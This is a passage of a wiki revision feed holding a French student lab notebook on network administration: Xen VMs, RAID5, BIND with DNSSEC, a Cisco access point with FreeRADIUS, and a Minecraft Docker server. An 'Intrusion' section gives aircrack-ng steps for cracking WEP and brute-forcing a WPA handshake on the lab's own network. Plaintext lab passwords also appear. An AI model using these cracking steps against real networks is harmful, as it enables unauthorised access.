 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 SE2A5-AP1(config)#ip default-gateway 10.0.0.1&lt;br /&gt;
&lt;br /&gt;
== Configuration du serveur RADIUS ==&lt;br /&gt;
&lt;br /&gt;
Le serveur RADIUS permet l’authentification des utilisateurs qui se connectent aux points d’accès Wifi (WPA-EAP).&lt;br /&gt;
&lt;br /&gt;
* Installer le paquet &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install freeradius&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;client SE2A51 {&lt;br /&gt;
        ipaddr  = 10.0.0.10&lt;br /&gt;
        secret  = glopglop&lt;br /&gt;
}&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajouter un utilisateur en modifiant le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;pifou Cleartext-Password := &amp;amp;quot;pasglop&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enables/eap&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;eap {&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
  ...&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Arrêter le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; durant la phase de tests :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius stop&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Démarrer &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; en mode debug :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;freeradius -X&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pendant que &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; est en mode debug, tenter de se connecter au réseau Wifi qui a été créé et vérifier que celle-ci est prise en compte.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:freeradius_X.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut également voir la connexion de l'appareil sur minicom&lt;br /&gt;
&lt;br /&gt;
[[Fichier:connexion_minicom.png]]&lt;br /&gt;
&lt;br /&gt;
Si la connexion est validée alors la configuration est correcte. Dans ce cas, arrêter le programme de debug et réactiver le service.&lt;br /&gt;
&lt;br /&gt;
* Redémarrer le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60281</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60281"/>
				<updated>2022-11-29T00:05:05Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Sécurisation des données - RAID5 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Verification&lt;br /&gt;
[[Fichier:RAID5_detestable.png]]&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
===DNS===&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.48&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  193.48.57.0/24;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===DNSSEC===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes;&lt;br /&gt;
dnssec-validation yes;&lt;br /&gt;
dnssec-lookaside auto;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Création du répertoire &amp;lt;code&amp;gt;detestable.site.dnssec&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;mkdir /etc/bind/detestable.site.dnssec/&lt;br /&gt;
cd /etc/bind/detestable.site.dnssec/&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Génération de la clef asymétrique de signature de clefs de zone :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA256 -b 2048 -f KSK -n ZONE detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mv Kdetestable.site.*.key detestable.site-ksk.key&lt;br /&gt;
mv Kdetestable.site.*.private detestable.site-ksk.private&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Génération de la clef asymétrique de signature des enregistrements :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA256 -b 2048 -n ZONE detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mv Kdetestable.site.*.key detestable.site-zsk.key&lt;br /&gt;
mv Kdetestable.site.*.private detestable.site-zsk.private&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;$include &amp;amp;quot;/etc/bind/detestable.site.dnssec/detestable.site-ksk.key&amp;amp;quot;&lt;br /&gt;
$include &amp;amp;quot;/etc/bind/detestable.site.dnssec/detestable.site-zsk.key&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Signature des enregistrements de la zone :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o detestable.site -k detestable.site-ksk ../db.detestable.site detestable.site-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;demineur.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site.signed&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK (présente dans le fichier &amp;lt;code&amp;gt;detestable.site-ksk.key&amp;lt;/code&amp;gt;) à Gandi.&amp;lt;br /&amp;gt;&lt;br /&gt;
L’algorithme utilisé est le 8 (RSA/SHA-256).&lt;br /&gt;
&lt;br /&gt;
=== Tester DNSSEC : ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cd /etc/bind/&lt;br /&gt;
dnssec-verify -o detestable.site db.detestable.site.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vérifier son DNS avec dnsviz ===&lt;br /&gt;
[[Fichier:dnsviz_detestable.png]]&lt;br /&gt;
&lt;br /&gt;
=Connexion wifi=&lt;br /&gt;
==Point d'accès wifi==&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
Mode terminal&lt;br /&gt;
 ap&amp;amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
Configuration du nom d’hôte :&lt;br /&gt;
 &amp;lt;pre&amp;gt;ap(config)#hostname SE2A5-AP1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accès SSH :&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Accès console :&lt;br /&gt;
 SE2A5-AP1(config)#line console 0&lt;br /&gt;
 SE2A5-AP1(config-line)#password glopglop&lt;br /&gt;
 SE2A5-AP1(config-line)#login authentification default&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Sécurisation des accès :&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
VLAN n°20&lt;br /&gt;
 &amp;lt;SE2A5-AP1(config)#aaa authentication login EAP_toto group RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config)#radius-server host 193.48.57.163 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 SE2A5-AP1(config)#aaa group server radius RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config-server)#server 193.48.57.163 auth-port 1812 acct-port 1813&lt;br /&gt;
 SE2A5-AP1(config-server)#exit&lt;br /&gt;
 SE2A5-AP1(config)#dot11 ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-ssid)#vlan 20&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication open eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication network-eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication key-management wpa&lt;br /&gt;
 SE2A5-AP1(config-ssid)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface g0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio 0&lt;br /&gt;
 SE2A5-AP2(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#encryption vlan 20 mode ciphers aes-ccm tkip&lt;br /&gt;
 SE2A5-AP1(config-if)#mbssid&lt;br /&gt;
 SE2A5-AP1(config-if)#ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyACM0&lt;br /&gt;
VLAN n°1 :&lt;br /&gt;
 SE2A5-AP1(config)#interface BVI 1&lt;br /&gt;
 SE2A5-AP1(config-if)#ip address 10.0.0.10 255.255.255.0&lt;br /&gt;
 SE2A5-AP1(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 SE2A5-AP1(config)#ip default-gateway 10.0.0.1&lt;br /&gt;
&lt;br /&gt;
== Configuration du serveur RADIUS ==&lt;br /&gt;
&lt;br /&gt;
Le serveur RADIUS permet l’authentification des utilisateurs qui se connectent aux points d’accès Wifi (WPA-EAP).&lt;br /&gt;
&lt;br /&gt;
* Installer le paquet &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install freeradius&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;client SE2A51 {&lt;br /&gt;
        ipaddr  = 10.0.0.10&lt;br /&gt;
        secret  = glopglop&lt;br /&gt;
}&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajouter un utilisateur en modifiant le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;pifou Cleartext-Password := &amp;amp;quot;pasglop&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enables/eap&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;eap {&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
  ...&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Arrêter le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; durant la phase de tests :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius stop&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Démarrer &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; en mode debug :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;freeradius -X&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pendant que &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; est en mode debug, tenter de se connecter au réseau Wifi qui a été créé et vérifier que celle-ci est prise en compte.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:freeradius_X.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut également voir la connexion de l'appareil sur minicom&lt;br /&gt;
&lt;br /&gt;
[[Fichier:connexion_minicom.png]]&lt;br /&gt;
&lt;br /&gt;
Si la connexion est validée alors la configuration est correcte. Dans ce cas, arrêter le programme de debug et réactiver le service.&lt;br /&gt;
&lt;br /&gt;
* Redémarrer le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
